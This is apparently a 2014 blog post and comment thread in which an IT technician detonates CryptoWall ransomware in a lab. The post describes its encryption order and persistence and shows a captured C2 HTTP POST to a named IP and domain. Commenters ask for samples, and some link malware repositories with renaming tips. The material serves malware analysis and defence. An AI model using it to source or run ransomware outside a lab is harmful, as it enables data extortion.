What, am I crazy ?
No, I have a lab setup with a DMZ and loads of protection. I just need to download and run Cryptowall as my final step. My setup includes some sample data to encrypt, wireshark for packet sniffing and Sysinternals Process Monitor.
So, let the fun begin. Thanks to the antivirus companies out there (Trend Micro etc) this is harder than I thought. I also had to dumb down my Sonicwall firewall to let viruses through. The antivirus companies have been taking down the virus URL’s faster than I can check them. It took ages to locate and download the Document-128_712.zip file. Awesome to see the AV companies are on top of their game.
So I had to bypass the built in Internet Explorer protection (It also wanted to kill my download) and finally I have Document-128_712.zip. I extracted out the contents. Document-128_712.scr with a PDF icon. I double click the screensaver file (Executable in disguise) and the file vanished. The mouse moves to an hourglass for a second and then nothing. I refer to the wireshark and process monitor. They are blitzing past recording data.
There is nothing at the desktop to indicate what is happening (except the hard disk light flashing). If I had been caught by this, I might be tempted to double click it again and again as nothing appears to happen.
As this thing encrypts alphabetically, I wait until I start seeing the signs of the encryption appearing in the hard drive sub folders and then I created a folder called “a” as in C:\a. It is safe as the process does not seem to double back once it has passed a letter of he alphabet. A nice place to save logs etc. So, here come the screenshots. Some from this current experiment, some from an actual infection.
So here is the Scr file, renamed into bd99547.exe. Is is the same file as Document-128_712.scr as the hashes are the same. It is in the startup group so it you restart your pc, it continues to encrypt.
Now showing all hidden files on the C:\ drive, I find a hidden folder with the same exe file in it.
So I let this thing continue on and do it’s job. The file exe file located in the startup startmenu category and on C:\ will vanish later. I watch as Process Monitor shows me the “exe” file I ran, using Windows built in cryptography to encrypt everything. I note that the malware does not need to download anything from the internet. Microsoft have already provided everything it needs. It is using Microsofts own tools to hold us ransom.
I watch it connect to 199.127.225.232 and do a HTTP post. This server is called babyslutsnil.com
POST /da2c5yzx438 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 100
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E)
Host: babyslutsnil.com
Cache-Control: no-cache
z=109a242f761c53dbf5fa7883a817baff7b6f70eec0b2c20b9c59a99d5e6ddcb49ed56d8d6082a4df4909c8600c5850ad16HTTP/1.1 500 Internal Privoxy Error
Date: Sun, 29 Jun 2014 23:41:14 GMT
Content-Length: 778
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Last-Modified: Sun, 29 Jun 2014 23:41:14 GMT
Expires: Sat, 17 Jun 2000 12:00:00 GMT
Pragma: no-cache
Connection: close
html
head
title 500 Internal Privoxy Error /title
link rel=”shortcut icon” href=”http://config.privoxy.org/error-favicon.ico” type=”image/x-icon”> /head
body
h1 500 Internal Privoxy Error /h1
pPrivoxy encountered an error while processing your request:/p
pbCould not load template file codeforwarding-failed/code or one of its included components./b/p
p Please contact your proxy administrator./p
p If you are the proxy administrator, please put the required file(s)in the code i (confdir) /i /templates /code directory. The location of the code i (confdir) /i /code directory is specified in the main Privoxy code>config/code file. (It’s typically the Privoxy install directory, or code/etc/privoxy//code)./p
/body
/html
I can only assume it is trying to send out the RSA encryption key to the remote server.
Then you start seeing the encrypted files in folders with additional files (DECRYPT_INSTRUCTION).
Then you find a key in the registry which starts off the same as the exe file name
and then the exe’s start to vanish and are replaced with the warnings you will see next reboot.
Then you get invited to go up, pay some money, download another exe file (Do you trust it?) with the decryption and away you go !
It uses the TOR network for the website so there is no way to track these guys. They are annonymous and invisable.
Now the trick is to get these files and screen shots from “C:\a” onto my USB key, as when I plug it in, the files get encrypted.
Final step, FORMAT THE MACHINE. My packet Sniffs and Process monitoring has shown me that this Malware gets all over your PC.
Don’t fix it, reformat it. You can recover files from Backups or Volume Shadow copy but the underlying OS is now owned by some remote hacker. Don’t dice with death!
Moral: Have offline current backups !
#1 by Jack on September 23, 2014 - 10:26 pm
Quote
Just ran into your post, trying to figure out where it starts encrypting if you have mapped drives. My scenario, 35 PCs with a mapped drive off a NAS, mirroring to another NAS nightly, virus ran on a Friday from 8 to 4 pm. 1/2 of the files in NAS1 encrypted, replicated to NAS2 that night no one noticed until Monday, nothing we can do at this point it seems. I noticed that on their decrypt page in Tor they dont show the number of encrypted files so I dont think that it finished encrypting even though it doenloaded the 3 Decrypt files in 1/2 of the directories. I can’t find the machine that infected the drive, have run the ListCwall program on all of them and searched foir decrypt, thinking only option is to run malwarebytes on all, or that someone deliberately ran on a laptop on which they mapped the drive
#2 by mickyj on September 25, 2014 - 10:48 am
Quote
In my expeariance it starts with the local PC, working through the local drives and folders alpabetically. Then it does the same on the network mapped drives.
#3 by sam on September 30, 2014 - 6:02 am
Quote
Thank’s for putting up this post. I’m actually trying to do exactly what you just did for my school project. Our plan is to analyse the malware by using reverse engineering techniques on it and write a report on it.
The problem is, I haven’t been able to successfully infect my test laptop.
Do you have a copy of the specimen?
Do you know if this specimen still works?
If you are unwilling to give me the specimen, could you at least give me the hash? I want to compare it to the specimen that I currently have.
#4 by mickyj on October 20, 2014 - 12:00 pm
Quote
Hello,
I would doubt anyone would keep this file on file and pass it out knowing the damage it causes. All my systems here (Where I work on clients machines) have had the file stripped out. Your best chance of getting this file is to contact someone like Virustotal, prove what your intentions are with the file and they *may* pass it along.
Even in a test environment, accidents happen and emailing this virus is not the easiest thing to do. If I come accross another infection, I will keep you in mind.
thanks
#5 by mickyj on November 7, 2014 - 10:38 am
Quote
I now have a copy of Cryptowall. I can send you aht hash is you like. else you can contact Virustotal and see if you can get the hashes from them.
#6 by isaac on October 8, 2014 - 5:55 am
Quote
Were doing the same thing, but man I am having a really hard time actually infecting myself here. Any idea where I can purposely download and infect my test lab?
Thanks!
#7 by mickyj on October 20, 2014 - 11:59 am
Quote
Hello,
I would doubt anyone would keep this file on file and pass it out knowing the damage it causes. All my systems here (Where I work on clients machines) have had the file stripped out. Your best chance of getting this file is to contact someone like Virustotal, prove what your intentions are with the file and they *may* pass it along.
Even in a test environment, accidents happen and emailing this virus is not the easiest thing to do. If I come accross another infection, I will keep you in mind.
thanks
#8 by mickyj on November 7, 2014 - 10:37 am
Quote
I have a version of Cryptowall (not cryptolocker) that arrived in my email this morning. I have zipped it up with a password so I will not infect myself. I still feel a little worried about emailing this to people as it is really damaging 🙁
#9 by Meep! on October 16, 2014 - 4:00 am
Quote
I have experienced some very strange behavior with Cryptowall-Namely, the fact that through some strange instance it managed to get onto my PC with absolutely no help, and secondly that it failed to encrypt even a single file. As far as I can tell, there’s no damage, Malwarebyte’s turned up nothing, and the only thing left behind is a large number of DECRYPT_INSTRUCTION in almost all directories. Besides that, no hostile processes are running and nothing is damaged. Any clue as to what’s screwed with it?
#10 by mickyj on October 20, 2014 - 11:51 am
Quote
I have seen a lot of these lately. I can only guess however, I would suggest you got it from a webpage where it used a Java exploit to get onto your PC.
I had one do exactly as per your symtoms but as the local Crypto service on the PC was playing up, nothing got encrypted (Crypto locker uses built in Windows tools and functions to do it’s work).
There are a large number of “broken” Crypto viruses out there. The writers are testing them out on people to help them write better viruses. Some of the Crypto code has been released to the hackers enmass and the “script kiddies” are trying to get rich quick using this code without understanding it and without making it work correctly. There are now a large number of Cryptolocker/Cryptowall variants and many are broken.
You are just lucky nothing has happened and you got a broken one. I would be thankful if I were you, then backup your data just in case, update your AV and update Java.
#11 by mickyj on November 7, 2014 - 10:35 am
Quote
I have recently seen this working through Java from a website. This might explain what has happened to you 🙁
#12 by LesH on October 24, 2014 - 12:18 am
Quote
Micky, I was interested in your comment about “dumbing down” your SonicWall to allow the CryptoWall virus through. I have a Sonicwall with GAV and IPS but in our testing the sonicwall allows the PC to infect a test network share with several PDF’s in it. Can you point me in the right direction on how/where to lock down the SonicWall to prevent us from getting hit by this?
Any info would be appreciated. Thanks.
#13 by mickyj on October 28, 2014 - 8:07 am
Quote
Hello,
As the original Cryptolocker has now been reinvented many times over by many new hackers and there are even competing viruses out there (e.g. CryptoWall) all with new infection methods, I am finding only certain versions are detected and blocked. Currently the only real way of preventing this and the new versions that use similar attack methods is to use policy’s, permissions and restrictions to specific areas of the users profile and system, to prevent the infection executing. Even this is no longer a failsafe as new exploits are being used to get this monster onto systems.
I fear the best protection is to have Gav turned on, use a good trusted local AV, Have an email scanner, install the policies on the PC and then teach the users what to look out for.
None of this will guarantee something new will be blocked but it is your best protection.
#14 by Jay Sun on November 26, 2014 - 10:04 am
Quote
I have been invested with Crypto Wall 2.0. I did not have back up and No system restore. I cleaned the system but I lost one very important excel file, which was decrypted. How to decrypt the file? I tried hard disk recovery and used various decryptors so for but nothing is decrypting. Is there any research going on? This is seems to be greatest challenge in IT today. No one in the world has not decrypted Crypto Wall 2.0 infected file so far. If so, this is a shame on the entire IT world from Oct 16th 2014
Jay Sun
#15 by mickyj on November 27, 2014 - 4:32 pm
Quote
Hello,
The nature of Cryptolocker is that it is encrypted using the very best encryption available. Using the best computer today, it would likley take over 600 years to crack it.
The best hope you have for your file is to email the file to the hacker as most of them will allow you to unlock 1 file as proof that they can do it for you.
They can do it for you as they havethe secret key to unlock your file.
#16 by Trooper on December 8, 2014 - 12:11 pm
Quote
Excellent writeup!!
On: “have recently seen this working through Java from a website”
For those of us who do not have your level of expertise, is it possible for you to provide a brief description of how this would work, and why the files do not get encrypted?
Many thanks!!
#17 by mickyj on December 8, 2014 - 3:34 pm
Quote
Hello,
the infection I came from a website showing an image gallery of 20 photos. As you move through the 20 photos (1 photo per webpage) you click the next button at the bottom of the page. Java was the technology used for fading the photo onto the screen and also the menuing system for the page. In the java code was some maicious code to silently download some files to your internet browser cache and execute them.
This exploited a security issue in the specific version of Java that was installed.
Once the Malware has got access to your system and executes, it uses built in encryption technologies in Windows. Windows can encypt all kinds of things, in some versions bitlocker can encrypt your whole hard disk. This is normally done at your request and you are normally given the encryption key. In the case of this virus, it takes that key, the final result of a very normal process, and sends it off to where you can’t get to it without paying the ransom.
In my test case, my encryption facility in Windows was ot working correctly due to some earlier things I was trying 🙂
#18 by Trooper on December 9, 2014 - 2:24 pm
Quote
Thank you for the info. Very much appreciated!
At this point, 199.127.225.XXX and babyslutsnil.com connections are being blocked by the AntiVirus and AntiMalware (MBAM) programs. Also, I think svchost.exe is involved.
However, have not found encrypted files, the typical DECRYPT_INSTRUCTION, or a Registry entry, etc.
Is there any action you recommend at this stage?
Also, is there a point in creating a folder called ‘a’ as described above? Since this thing encrypts alphabetically, and no files are encrypted yet, wouldn’t it be detrimental to create the ‘a’ folder and place files in it?
#19 by mickyj on December 9, 2014 - 2:42 pm
Quote
Hello,
Yes, the AV companies started blocking those early on. As the hackers make so much money doing this, they have since purchased new domain names and as these are uncovered, they also get blocked.
Maybe your version of the infection has misfired. If you create a folder called “a” and put things in it, nothing will break.
I tried this on one infection and as the virus had already moved on from “a” and was at about “m” it never went back to my new folder to infect it.
#20 by Trooper on December 9, 2014 - 11:16 pm
Quote
Thanks again!!
If no files are encrypted yet, wouldn’t this malware start with the ‘a’ folder? What am I missing?
.
#21 by mickyj on December 12, 2014 - 10:29 am
Quote
There are many new versions of this virus out there, most of them will start with “a”.
If “a” is not encrypted then either you do nto have this virus or the Malware has not run correctly and failed.
Count yourself lucky
#22 by Trooper on December 12, 2014 - 11:25 pm
Quote
Thank you!!!
IMO, something misfired. Fine with me. 🙂
Have a great holiday season!!!
#23 by mark on January 19, 2015 - 11:46 am
Quote
I could really use a copy of any ransomeware. A client of mine was recently infected and their IT company is still struggling weeks later cleaning up the mess. But I believe I have a method of blocking the virus from the servers… catching it on the servers, and blocking it’s ability to encrypt any server-shared files… How can I get myself infected?
#24 by Sriram Iyer on February 2, 2015 - 9:15 pm
Quote
Micky, Great write-up. I am trying to test CryptoWALL 3.0. I have a sample from here, https://malwr.com/analysis/MDA0MjIzOGFiMzVkNGEzZjg3NzdlNDAxMDljMDQyYWQ/
My intention is to test my SonicWALL firewall.
I was able to successfully infect two VirtualBox VMs. However, the download of the public key and the subsequent encryption happened after about 2-3 hours and I was unable to capture the traffic.
So I set up packet captures in the SonicWALL firewall as well as within a third VM; copied PPT, PDF and TEXT data and then executed the file from the above site (it’s a bin file which I renamed to exe).
However, in my third attempt the malware does not seem to get the public key to encrypt the files. It does not move past the HTTP POST attempts, which are always reset (TCP RST).
I am sure it is not the SonicWALL firewall because in the first two attempts it was able to infect undetected. And till now no logs are seen in the SonicWALL to indicate that its blocking it.
My questions are:
1. How long does it take from the initial infection to the encryption of files/drives?
2. Is running in a VirtualBox VM stop the malware? I read that CryptoWall 2.0 does not execute its second “layer” if it detects the OS is a VM (as per this blog : https://blogs.cisco.com/talos/Cryptowall-2). I have “end processed” the VirtualBox service. Moreover, in the first 2 attempts it did execute till the end even with VirtualBox service running.
3. Is the malware sample from malwr.com the right one?
I would appreciate if you would take time to answer my questions and shed light on any other aspect that I may have missed.
#25 by mickyj on February 3, 2015 - 8:58 pm
Quote
Hello,
I am very impressed at your testing. Yes, I also used the packet sniffing feature in my Sonicwall and wireshark to pin down how my sample worked but my key was exchanged seconds after the virus was executed and the encrypting began immediately, working alphabetically through the files, folders and drives.
As cryptolocker has been updated and changed a great many times, with many new hackers changing it, who knows what it is you have downloaded and what you really need to test with. As it is changing so frequently, the symptoms between versions also change.
#26 by Sriram Iyer on February 5, 2015 - 12:04 pm
Quote
Thanks Micky. I am trying to infect a 4th VM. I have the made sure the tasklist does not have VirtualBox in it. I will keep you posted whatever happens.
#27 by pceinc on March 8, 2015 - 1:25 am
Quote
Are the IP’s and domains used by the Cryto* infections based in the USA? Would geoblocking other countries help prevent the infection from phoning home thus preventing the encryption process or is the key generated locally and then sent to the remote servers?
#28 by mickyj on March 10, 2015 - 3:32 pm
Quote
Hello,
They key is generated locally and even if it cannot send, the encryption occurs. The remote servers are scattered in many places so Geoblocking would not be a good answer 🙁
#29 by bogdan on April 16, 2015 - 2:07 pm
Quote
Do you happen to have a sample of cryptowall/3 ?
Please email it to me if you do!
Thank you!
#30 by mickyj on June 1, 2015 - 9:08 am
Quote
Hello, I have many samples of many different Cryptowall’s however I am not sure which is version 3. I am very relucatant to pass on samples to anyone.
#31 by John on June 13, 2015 - 12:52 am
Quote
So if we disable the Cryptographic Service before we are attacked will that prevent the encryption?
#32 by mickyj on June 22, 2015 - 9:49 am
Quote
The latest versions have been enabling it and there are other ways of doing this so this is not the solution. Trend Micro WorryFree 9 SP1 with the latest hotfix has the Crypto prevention built in. I believe Officescan also ha it and Trend services is not far behind.
#33 by Iz_m on July 2, 2015 - 5:25 am
Quote
I got myself successfully infected with the Cryptowall 3.0, by downloading it from here:
https://malwr.com/analysis/MTBhNWQ5NjRiZGMzNDIyNGE3Y2VmMGIyOWZjM2I3YTU/
The file needs to be renamed to the original IPv4_updater.exe
It took a minute or two, then I rebooted and bam. Help decrypt everywhere! We are currently working on implementing a Software Restriction Policy to block it from the beginning
#34 by mickyj on July 2, 2015 - 12:13 pm
Quote
thanks. I see so many new samples (like cryotowall 3.0) that I have moved on from the original cryptolocker.
as my antivirus protects against all crypto’s using email/web reputation and also detecting the crypto process, then I am no longer looking for policies to prevent. I am using trend micro worry free 9 with sp1 and the latest hotfix for crypto
#35 by ran on July 24, 2015 - 4:25 pm
Quote
I also want to obtain this virus and test it and many scenarios are coming to my mind to decrypt infected files.
I’ll visit this page again when I have time to test it.
#from ph
#36 by mickyj on July 26, 2015 - 8:04 pm
Quote
Hello,
Cryptolocker, Cryptowall, TorrentLocker and many others, have changed a lot since this post. There has been a new version almost every week. There is very little reason to test this old version as things have moved on. Cryptowall 3.0 is of more recent concern.
#37 by Matthew196 on August 9, 2015 - 1:50 pm
Quote
I was just wondering is there any way to keep this virus from entering a computer. I currently have BitDefender Internet Security, VIPRE Internet Security (with AV turned off to prevent fighting between the 2), BitDefender Anti-Ransomware (Crypto Vaccine), Spyhunter 4, Malwarebytes Anti-Malware, and Cryptoprevent Tool (a tool that changes policies to help stop things from being run in %startup% and %appdata%, along with other protections from FoolishIt.com.
Is there any other good program I can use with these programs I already have… I’m not a Norton or McFee fan because they claim there resource and memory hogs and don’t use them…
AS I was hit by this NASTY Cryptowall 3.0 virus and I didn’t even download anything I think I got it from news websites that have lots of ads.
For me I was lucky enough to stop the virus before it completed its tasks but the damage it done was still horrific.
#38 by mickyj on August 9, 2015 - 4:09 pm
Quote
Hello,
Currently there are new infection methods and new versions constantly coming out. Some now can react even when you are not a local admin and even place files in locations other than appdata and startup. Some even now download the crypto services if you don’t have them installed and some are now uninstalling protections. I saw one a week ago that uninstalled Symantec and Vipre on 5 PC’s on a network. What I am saying is that there is no magic bullet and as soon as there is, a virus writer finds a way around it.
you are likely doing all you can do. The best protection at the moment is using some form of web reputation services that blocks URLS’s in your browser. AVG and Trend Micro do this. even then, you are waiting on them to update their databases of compromised links and this changes hourly.
There are some recent wordpress infections that silently download and execute exe files on your PC, just from visiting the website so yes, anyone can get these nasty things.
#39 by Matthew196 on August 10, 2015 - 8:03 am
Quote
Hi again,
Yeah being a intermediate/advanced computer user myself yeah its amazing how stealthy this darn virus really is. Plus encryption was designed to protect people from people from getting there sensitive information stolen from people like thieves, and now I really cannot believe it that thieves are now using this crap as a weapon against average computer users…
Encryption was never designed to be used like this and I truly hate the idea to think thieves can now use encryption to there advantage. There’s some truly sick people out there and I hope the FBI/CIA or even NSA can catch them!!
Its scary what this world is coming to with computers… Encryption is a powerful tool and now they have found ways of weaponizing it, that’s as scary as heck!! Especially any Encryption at 2048 bit!!
Regardless if its AES, RSA, Blowfish, and MANY MANY MANY others, there all powerful!! :/
I just wish there was a way to stop a person from encrypting files on your computer without your explicit consent… Like in such a way all files on your computer cannot be encrypted unless each file has your consent like way to prompt a user to confirm each file being encrypted and take automation and silent use outta the process…
#40 by SysAdm1nR on September 9, 2015 - 5:03 am
Quote
He there,
I’ve got a lab I’m working on for my company. The plan is to test some “Freezing” software for our current clients. I need to infect my lab with many virus’. I know this is a pretty dated article so far but it’s been my best lead so far… I need a copy of CryptoWall 3.x and possible various others. My lab is a mostly virtual environment not connected to our current network by any means. I’ve looked around VirusTotal and will post there soon as well. Just hoping to get pointed in the right direction. Thanks!
#41 by Simon on September 15, 2015 - 4:14 am
Quote
We have had a similar idea, one of our clients got hit with this recently, cryptowall 3.0 which leaves behind crypto_help files. Interesting thing is that the encrypted files show their correct extensions eg DOCX with no obvious sign they are locked. i set up a linux vm installed TOR and tried out the test to upload a file and get it back opened up for free. It worked but the clien is not willing to pay the ransom… which has to be cheaper than the hours im putting in. Anyway has anyone had any luck in recovering the private key from the infected computer using data recovery software? the key would have possibly resided in the Windows Crypto folder before it was sent off to the remote server. I would also like to infect the same machine with the same malware to see if we can recreate the key that way, any ideas?
Should keep me busy this Autumn if nothing else.
#42 by mickyj on November 9, 2015 - 12:58 pm
Quote
This is a great idea and I have not heard anyone try this !
#43 by Rafael S on September 23, 2015 - 11:43 pm
Quote
Hey dudes,
I’m enjoying doing analyzes on malware via the Cuckoo Sandbox, but I can not find many samples to test. You know where I can get some ransomwares or viruses of various kinds?
For those who do not know the Cuckoo is a tool powered by Google, where it is malware testing with it.
#44 by Brian on November 10, 2015 - 7:03 am
Quote
Hi, where did you download a copy of the ransomware? I’m interested in doing similar testing to see what measures could prevent it. Thanks!
#45 by mickyj on November 12, 2015 - 2:21 pm
Quote
Hello,
Due to the nature of Crypto Wall (Especially version 4) I am extremely careful about handing it out. I only hand it to people whom can show a history of dealing with these types of things and with no malicious intent.
#46 by GrumpyITGuy on November 18, 2015 - 6:49 am
Quote
I have had two run ins with CrytpoWall 3 this month.
Typically, I have been able to identify the source computer by the account that’s listed as “owner” on the decrypt files. The first one this month, the owner was “Administrator”, though nobody logs in as administrator. We found the infection because the user fessed up to having clicked a link in an email he didn’t expect.
Second run in, which was really weird, the owner information was listed, and when I scanned the user’s machine, it came up completely clean – This is not the weird part, I believe that he realized something was up, and scanned his own machine, cleaned it out, and went home early… Haven’t proven it yet.
The weird part is that the shadow copy restore points were there. “Great!” I thought. We scanned every system, just in case, and I restored the whole Drive back to before we think the infection hit… it was tough to tell, we had to find all the decrypt files, and then just go to the most recent restore point before the earliest decrypt file…
Anyway, they say things were fine after the restore, which was back to (for example) Tuesday morning at 7am. Later in the day, they found encrypted files, and decrypt_help files again… Though, they can’t swear that they were NOT there in the morning.
Now, the Decrypt_Help files had a modified date of Thursday at 11am… How could it be possible that on Friday morning, after a complete restore via shadow copy back to Tuesday, could there be files from Thursday?
I feel like whatever version this was infected the restore points, much like malware does to workstation system restore…?
#47 by Jayson on April 4, 2016 - 4:03 pm
Quote
Hello Micky:
Do you still have the PCAP files with you? Could I ask for a copy?
#48 by mickyj on April 15, 2016 - 7:35 pm
Quote
I can certainly try and find them but they are very large.
#49 by Ransomware seeker on April 7, 2016 - 8:34 pm
Quote
Hey every one,
I’m trying to test some ransomewares on some isolated VMs with connection to the internet but all of them doesn’t encrypt anything …anyone can help please?
Thanks alot
#50 by headgeek on April 28, 2016 - 5:51 am
Quote
Have you done any testing on Windows 10 with Device Guard installed and code integrity policies (basically Whitelisitng)? I have this working in my lab and am wondering if it is an effective way of blocking Ransomware but have no access to the actual Ransomware. Thanks
#51 by mickyj on December 16, 2016 - 1:26 pm
Quote
Hello,
Generally I don’t hand out the ransomware samples. Ethically, I worry about where the samples end up.
#52 by Larry Fingleton on May 27, 2016 - 6:17 pm
Quote
Can anyone send me some ransomware for testing.
info@lexusgroup.com
#53 by mickyj on December 16, 2016 - 1:27 pm
Quote
Hello,
Generally, I don’t send samples to requests as I don’t know what the samples are being used for
#54 by ivan on September 6, 2016 - 3:33 am
Quote
Hello guys I need or a similar virus to infect a virtual machine and do try to increase security.
Can you help me?
#55 by mickyj on December 16, 2016 - 1:28 pm
Quote
Hello,
Generally I don’t supply samples.
#56 by Tom on December 12, 2016 - 10:08 pm
Quote
Hi. Got a computere here infected with this CrytoWall 3 and does anyone know how to get my files back? Have been able to get rid of the shit with Norton Power Eraser.